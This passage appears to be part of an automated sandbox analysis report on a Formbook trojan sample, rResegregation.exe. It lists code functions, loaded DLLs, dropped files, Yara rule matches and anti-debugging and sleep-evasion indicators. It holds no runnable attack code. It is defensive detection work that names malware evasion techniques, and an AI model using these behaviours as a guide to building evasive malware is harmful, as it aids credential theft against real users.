        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030E51C05_2_030E51C0
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030FB1E05_2_030FB1E0
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_0318E0765_2_0318E076
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_0311508C5_2_0311508C
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030D00A05_2_030D00A0
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030EB0D05_2_030EB0D0
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_031970F15_2_031970F1
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_031967575_2_03196757
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030E27605_2_030E2760
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030EA7605_2_030EA760
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030FC6005_2_030FC600
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_0317D62C5_2_0317D62C
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_0318D6465_2_0318D646
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_031046705_2_03104670
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030E06805_2_030E0680
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_0319A6C05_2_0319A6C0
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030DC6E05_2_030DC6E0
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_0319F6F65_2_0319F6F6
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_031536EC5_2_031536EC
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_031AA5265_2_031AA526
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_0319F5C95_2_0319F5C9
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_031975C65_2_031975C6
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030E04455_2_030E0445
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_0314D4805_2_0314D480
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_0311DB195_2_0311DB19
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030E0B105_2_030E0B10
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_0319FB2E5_2_0319FB2E
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03154BC05_2_03154BC0
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_0319CA135_2_0319CA13
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_0319EA5B5_2_0319EA5B
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_0319FA895_2_0319FA89
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030FFAA05_2_030FFAA0
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030DE9A05_2_030DE9A0
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_0319E9A65_2_0319E9A6
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_031259C05_2_031259C0
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_0310E8105_2_0310E810
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030E38005_2_030E3800
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_031808355_2_03180835
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030C68685_2_030C6868
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_0319F8725_2_0319F872
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030E98705_2_030E9870
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030FB8705_2_030FB870
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030F68825_2_030F6882
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_031598B25_2_031598B2
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_031918DA5_2_031918DA
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030E28C05_2_030E28C0
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_031978F35_2_031978F3
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030ECF005_2_030ECF00
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_0319FF635_2_0319FF63
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_0319EFBF5_2_0319EFBF
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03191FC65_2_03191FC6
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030E6FE05_2_030E6FE0
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03100E505_2_03100E50
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03122E485_2_03122E48
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03180E6D5_2_03180E6D
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03190EAD5_2_03190EAD
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030E1EB25_2_030E1EB2
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030D2EE85_2_030D2EE8
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030DAD005_2_030DAD00
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_0319FD275_2_0319FD27
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03197D4C5_2_03197D4C
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030E0D695_2_030E0D69
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030F2DB05_2_030F2DB0
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030E9DD05_2_030E9DD0
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_0317FDF45_2_0317FDF4
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030D0C125_2_030D0C12
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030EAC205_2_030EAC20
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_0318EC4C5_2_0318EC4C
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030E3C605_2_030E3C60
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03196C695_2_03196C69
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_0319EC605_2_0319EC60
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_03179C985_2_03179C98
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030F8CDF5_2_030F8CDF
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030FFCE05_2_030FFCE0
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_031AACEB5_2_031AACEB
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: String function: 377AB910 appears 266 times
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: String function: 3782E692 appears 84 times
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: String function: 377F5050 appears 36 times
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: String function: 3783EF10 appears 104 times
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: String function: 37807BE4 appears 87 times
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: String function: 03127BE4 appears 88 times
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: String function: 030CB910 appears 268 times
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: String function: 03115050 appears 36 times
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: String function: 0315EF10 appears 105 times
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: String function: 0314E692 appears 85 times
        Source: rResegregation.exe, Static PE information: invalid certificate
        Source: rResegregation.exe, 00000002.00000003.28842814166.0000000007590000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamewinrshost.exej% vs rResegregation.exe
        Source: rResegregation.exe, 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp, Binary or memory string: OriginalFilenamentdll.dllj% vs rResegregation.exe
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: oleacc.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: riched20.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: usp10.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: msls31.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\SysWOW64\winrshost.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\SysWOW64\winrshost.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dllJump to behavior
        Source: rResegregation.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: 00000002.00000002.28913678466.0000000037460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000004.00000002.33362897827.0000000006590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000005.00000002.30433716160.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000005.00000002.30433631570.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: classification engine, Classification label: mal84.troj.evad.winEXE@5/9@2/2
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 0_2_004030EC EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004030EC
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 0_2_0040432F GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_0040432F
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 0_2_0040205E CoCreateInstance,MultiByteToWideChar,0_2_0040205E
        Source: C:\Users\user\Desktop\rResegregation.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\Arsenalers.iniJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeFile created: C:\Users\user\AppData\Local\Temp\nsjEDD.tmpJump to behavior
        Source: rResegregation.exe, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\rResegregation.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: rResegregation.exe, ReversingLabs: Detection: 44%
        Source: C:\Users\user\Desktop\rResegregation.exeFile read: C:\Users\user\Desktop\rResegregation.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\rResegregation.exe C:\Users\user\Desktop\rResegregation.exe
        Source: C:\Users\user\Desktop\rResegregation.exeProcess created: C:\Users\user\Desktop\rResegregation.exe C:\Users\user\Desktop\rResegregation.exe
        Source: C:\Program Files (x86)\szoXoDzskkTxxhZpoRGYohtCWuXRRKBotonSSvXwdmZhRyVfAEJdGWdZEtpIlJlyetsE\xkRPErfRaAOsoZkVUeZdSyiUrenXLw.exeProcess created: C:\Windows\SysWOW64\winrshost.exe C:\Windows\SysWOW64\winrshost.exe
        Source: C:\Users\user\Desktop\rResegregation.exeProcess created: C:\Users\user\Desktop\rResegregation.exe C:\Users\user\Desktop\rResegregation.exeJump to behavior
        Source: C:\Program Files (x86)\szoXoDzskkTxxhZpoRGYohtCWuXRRKBotonSSvXwdmZhRyVfAEJdGWdZEtpIlJlyetsE\xkRPErfRaAOsoZkVUeZdSyiUrenXLw.exeProcess created: C:\Windows\SysWOW64\winrshost.exe C:\Windows\SysWOW64\winrshost.exeJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeFile written: C:\Windows\hotdoggen.iniJump to behavior
        Source: rResegregation.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: winrshost.pdb source: rResegregation.exe, 00000002.00000002.28900231862.000000000758D000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdb source: rResegregation.exe, 00000002.00000001.28611627933.0000000000649000.00000020.00000001.01000000.00000008.sdmp
        Source: Binary string: wntdll.pdbUGP source: rResegregation.exe, 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000003.28784367288.00000000375D4000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: rResegregation.exe, rResegregation.exe, 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000003.28784367288.00000000375D4000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmp, winrshost.exe
        Source: Binary string: mshtml.pdbUGP source: rResegregation.exe, 00000002.00000001.28611627933.0000000000649000.00000020.00000001.01000000.00000008.sdmp
        Source: Binary string: winrshost.pdbGCTL source: rResegregation.exe, 00000002.00000002.28900231862.000000000758D000.00000004.00000020.00020000.00000000.sdmp

        Data Obfuscation

        Source: Yara matchFile source: 00000000.00000002.28752832983.0000000005595000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_10001A5D
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 0_2_10002D20 push eax; ret 0_2_10002D4E
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B08CD push ecx; mov dword ptr [esp], ecx2_2_377B08D6
        Source: C:\Windows\SysWOW64\winrshost.exeCode function: 5_2_030D08CD push ecx; mov dword ptr [esp], ecx5_2_030D08D6
        Source: C:\Users\user\Desktop\rResegregation.exeFile created: C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\nsExec.dllJump to dropped file
        Source: C:\Users\user\Desktop\rResegregation.exeFile created: C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\rResegregation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\winrshost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F1763 rdtsc 2_2_377F1763
        Source: C:\Windows\SysWOW64\winrshost.exeWindow / User API: threadDelayed 9852Jump to behavior
        Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 891Jump to behavior
        Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 864Jump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\nsExec.dllJump to dropped file
        Source: C:\Users\user\Desktop\rResegregation.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\rResegregation.exeAPI coverage: 0.3 %
        Source: C:\Windows\SysWOW64\winrshost.exeAPI coverage: 1.1 %
        Source: C:\Windows\SysWOW64\winrshost.exe TID: 2192Thread sleep count: 122 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\winrshost.exe TID: 2192Thread sleep time: -244000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\winrshost.exe TID: 2192Thread sleep count: 9852 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\winrshost.exe TID: 2192Thread sleep time: -19704000s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\winrshost.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 0_2_00406010 FindFirstFileA,FindClose,0_2_00406010
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 0_2_004055AE GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004055AE
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 0_2_00402688 FindFirstFileA,0_2_00402688
        Source: rResegregation.exe, 00000002.00000002.28900231862.0000000007569000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000002.28900231862.0000000007530000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: C:\Users\user\Desktop\rResegregation.exeAPI call chain: ExitProcess graph end nodegraph_0-4170
        Source: C:\Users\user\Desktop\rResegregation.exeAPI call chain: ExitProcess graph end nodegraph_0-4319
        Source: C:\Users\user\Desktop\rResegregation.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeProcess queried: DebugPortJump to behavior
        Source: C:\Windows\SysWOW64\winrshost.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F1763 rdtsc 2_2_377F1763
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F34E0 NtCreateMutant,LdrInitializeThunk,2_2_377F34E0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_10001A5D
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B4779 mov eax, dword ptr fs:[00000030h]2_2_377B4779
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3788B781 mov eax, dword ptr fs:[00000030h]2_2_3788B781
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3788B781 mov eax, dword ptr fs:[00000030h]2_2_3788B781
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377E0774 mov eax, dword ptr fs:[00000030h]2_2_377E0774
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C2760 mov ecx, dword ptr fs:[00000030h]2_2_377C2760
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F1763 mov eax, dword ptr fs:[00000030h]2_2_377F1763
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F1763 mov eax, dword ptr fs:[00000030h]2_2_377F1763
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F1763 mov eax, dword ptr fs:[00000030h]2_2_377F1763
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F1763 mov eax, dword ptr fs:[00000030h]2_2_377F1763
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F1763 mov eax, dword ptr fs:[00000030h]2_2_377F1763
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377F1763 mov eax, dword ptr fs:[00000030h]2_2_377F1763
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3782E79D mov eax, dword ptr fs:[00000030h]2_2_3782E79D
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3782E79D mov eax, dword ptr fs:[00000030h]2_2_3782E79D
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3782E79D mov eax, dword ptr fs:[00000030h]2_2_3782E79D
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3782E79D mov eax, dword ptr fs:[00000030h]2_2_3782E79D
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3782E79D mov eax, dword ptr fs:[00000030h]2_2_3782E79D
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3782E79D mov eax, dword ptr fs:[00000030h]2_2_3782E79D
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3782E79D mov eax, dword ptr fs:[00000030h]2_2_3782E79D
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3782E79D mov eax, dword ptr fs:[00000030h]2_2_3782E79D
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3782E79D mov eax, dword ptr fs:[00000030h]2_2_3782E79D
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3787D7A7 mov eax, dword ptr fs:[00000030h]2_2_3787D7A7
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3787D7A7 mov eax, dword ptr fs:[00000030h]2_2_3787D7A7
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3787D7A7 mov eax, dword ptr fs:[00000030h]2_2_3787D7A7
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AF75B mov eax, dword ptr fs:[00000030h]2_2_377AF75B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AF75B mov eax, dword ptr fs:[00000030h]2_2_377AF75B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AF75B mov eax, dword ptr fs:[00000030h]2_2_377AF75B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AF75B mov eax, dword ptr fs:[00000030h]2_2_377AF75B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AF75B mov eax, dword ptr fs:[00000030h]2_2_377AF75B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AF75B mov eax, dword ptr fs:[00000030h]2_2_377AF75B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AF75B mov eax, dword ptr fs:[00000030h]2_2_377AF75B
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AF75B mov eax, dword ptr fs:[00000030h]2_2_377AF75B
